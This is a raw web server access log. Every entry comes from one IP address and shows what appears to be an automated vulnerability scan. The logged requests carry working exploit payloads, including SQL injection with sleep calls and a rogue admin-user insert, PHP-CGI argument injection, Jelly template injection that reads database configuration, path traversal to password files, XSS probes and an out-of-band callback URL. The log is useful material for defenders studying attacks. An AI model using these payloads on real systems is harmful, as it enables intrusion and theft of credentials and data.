"Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:47:56 -0400] "GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:11:48:18 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:11:48:39 -0400] "POST /Startup/Register HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:48:42 -0400] "POST /Token HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:49:02 -0400] "POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" 154.84.62.234 - - [24/Apr/2025:11:49:05 -0400] "POST /bower_components/angular-base64-upload/demo/server.php 
HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:49:16 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:49:51 -0400] "GET /login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:49:51 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:11:50:03 -0400] "GET /?p=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:50:28 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:50:43 -0400] "POST /business-directory/?dosrch=1&q&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1] HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:51:01 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:51:04 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:51:47 -0400] "GET /solr/admin/info/properties:/admin/info/key HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79" 154.84.62.234 - - [24/Apr/2025:11:51:52 -0400] "GET /default.aspx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:52:06 -0400] "POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:52:10 -0400] "GET /common/xdumo.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:11:52:49 -0400] "POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:53:34 -0400] "PUT /api/v2/simulation HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:53:40 -0400] "POST /webtools/control/view/StatsSinceStart HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:54:36 -0400] "GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20" 154.84.62.234 - - [24/Apr/2025:11:54:54 -0400] "GET /~projects HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:55:47 -0400] "GET /players.json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:55:58 -0400] "GET /asispanel/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:56:32 -0400] "POST /c/router HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:32 -0400] "POST /c/router HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:33 -0400] "POST /api/v2/templates/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:36 -0400] "POST /api/v2/observables/extended HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:56:40 -0400] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:11:56:43 -0400] "POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:45 -0400] "POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:46 -0400] "POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:57:00 -0400] "POST 
/jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:57:00 -0400] "POST /drag/onlDragDatasetHead/getTotalData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:11:57:38 -0400] "GET /admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:57:37 -0400] "GET /-/media/doo-doo.ashx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:58:01 -0400] "POST /cgi-bin/skk_get.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:58:31 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 154.84.62.234 - - [24/Apr/2025:11:58:33 -0400] "POST /php/components/logs.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:59:08 -0400] "GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j=\"jelly\"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:59:15 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:59:21 -0400] "POST /add_reference_to_local_model HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:11:59:21 -0400] "POST 
/NmAPI/RecurringReport HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:59:57 -0400] "GET /file=http://oast.pro/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:00:10 -0400] "POST /index.php?rest_route=/wqc/v1/query HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:00:38 -0400] "POST /v1/api HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" 154.84.62.234 - - [24/Apr/2025:12:01:01 -0400] "POST /postlocal HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:01:03 -0400] "POST /boafrm/formSysCmd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:01:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.4.21" 154.84.62.234 - - [24/Apr/2025:12:01:10 -0400] "GET /v2m14F.txt?true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:01:14 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:12:01:34 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" 154.84.62.234 - - [24/Apr/2025:12:01:41 -0400] "GET /Synchronization HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - {{username}} [24/Apr/2025:12:01:47 -0400] "PUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1" 200 118986 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.153183" 154.84.62.234 - - [24/Apr/2025:12:02:35 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:12:02:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:12:03:01 -0400] "GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1\x0920.51" 154.84.62.234 - - [24/Apr/2025:12:03:06 -0400] "GET 
/login.do?jvar_page_title=%3c%73%74%79%6c%65%3e%3c%6a%3a%6a%65%6c%6c%79%20%78%6d%6c%6e%73%3a%6a%3d%22%6a%65%6c%6c%79%3a%63%6f%72%65%22%20%78%6d%6c%6e%73%3a%67%3d%27%67%6c%69%64%65%27%3e%3c%67%3a%65%76%61%6c%75%61%74%65%3e%7a%3d%6e%65%77%20%50%61%63%6b%61%67%65%73%2e%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%22%22%29%2e%67%65%74%41%62%73%6f%6c%75%74%65%50%61%74%68%28%29%3b%7a%3d%7a%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%7a%2e%6c%61%73%74%49%6e%64%65%78%4f%66%28%22%2f%22%29%29%3b%75%3d%6e%65%77%20%53%65%63%75%72%65%6c%79%41%63%63%65%73%73%28%7a%2e%63%6f%6e%63%61%74%28%22%2f%63%6f%2e%2e%6e%66%2f%67%6c%69%64%65%2e%64%62%2e%70%72%6f%70%65%72%74%69%65%73%22%29%29%2e%67%65%74%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%29%3b%73%3d%22%22%3b%77%68%69%6c%65%28%28%71%3d%75%2e%72%65%61%64%4c%69%6e%65%28%29%29%21%3d%3d%6e%75%6c%6c%29%73%3d%73%2e%63%6f%6e%63%61%74%28%71%2c%22%5c%6e%22%29%3b%67%73%2e%61%64%64%45%72%72%6f%72%4d%65%73%73%61%67%65%28%73%29%3b%3c%2f%67%3a%65%76%61%6c%75%61%74%65%3e%3c%2f%6a%3a%6a%65%6c%6c%79%3e%3c%2f%73%74%79%6c%65%3e HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:03:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:03:28 -0400] "GET /ganglia/?tz=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:12:03:33 -0400] "GET /ganglia/graph_all_periods.php?g=%22%22%20autofocus%20onfocus=alert(document.domain)//%22 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:04:03 -0400] "GET /api/get-browser-snapshot?snapshot_path=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 
(Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:04:33 -0400] "GET /cgi-bin/sslvpnclient?launchplatform HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:05:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:12:05:37 -0400] "GET /workflow/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:05:46 -0400] "GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272w9rfa96ik4o8oqgdmehoaclse2%27%2C+NULL%2C+%27AE6EC5D3CFB57690D240B4611C4DDD20%27%2C+%272w9rfa96ik4o8oqgdmehoaclse2FirstName%27%2C+%272w9rfa96ik4o8oqgdmehoaclse2LastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272w9rfa96ik4o8oqgdmehoaclse2%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%2
7%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:12:05:49 -0400] "GET /workflow/jsp/logon.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.8.24" 154.84.62.234 - - [24/Apr/2025:12:06:01 -0400] "POST /device/description_en.html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.3.25" 154.84.62.234 - - [24/Apr/2025:12:06:01 -0400] "GET /settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:06:06 -0400] "POST /settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:06:11 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:12:06:26 -0400] "GET //juis_boxinfo.xml HTTP/1.1" 200 118692 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:12:06:27 -0400] "GET /?true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:07:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21" 154.84.62.234 - - 
[24/Apr/2025:12:07:05 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:07:27 -0400] "GET /service-worker.js?local_access_token=2w9rfR2QrMwuCdDa8Ro4ebk0Rec HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19" 154.84.62.234 - - [24/Apr/2025:12:07:29 -0400] "PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.23" 154.84.62.234 - - [24/Apr/2025:12:07:30 -0400] "GET /?--configPath=/nuclei_test/5294673340 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:07:53 -0400] "GET /admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:12:07:58 -0400] "GET /admin/compass?download=L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:08:18 -0400] "GET /admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:08:19 -0400] "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13" 154.84.62.234 - - [24/Apr/2025:12:08:22 -0400] "POST /Synchronization HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.63" 154.84.62.234 - - [24/Apr/2025:12:08:33 -0400] "GET 
/nifi-api/flow/process-groups/root HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:12:08:33 -0400] "GET /nifi-api/controller/config HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6" 154.84.62.234 - - [24/Apr/2025:12:08:36 -0400] "GET /users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_3; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:08:41 -0400] "GET /users;. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:08:42 -0400] "GET /admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 154.84.62.234 - - [24/Apr/2025:12:08:49 -0400] "GET /admin/compass?del=PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPi5sb2c= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:08:53 -0400] "GET /admin/compass?logs=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:12:09:27 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:12:09:53 -0400] "POST /cgi/getGDPRParm HTTP/1.1" 200 0 "http://tplinkwifi.net" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - 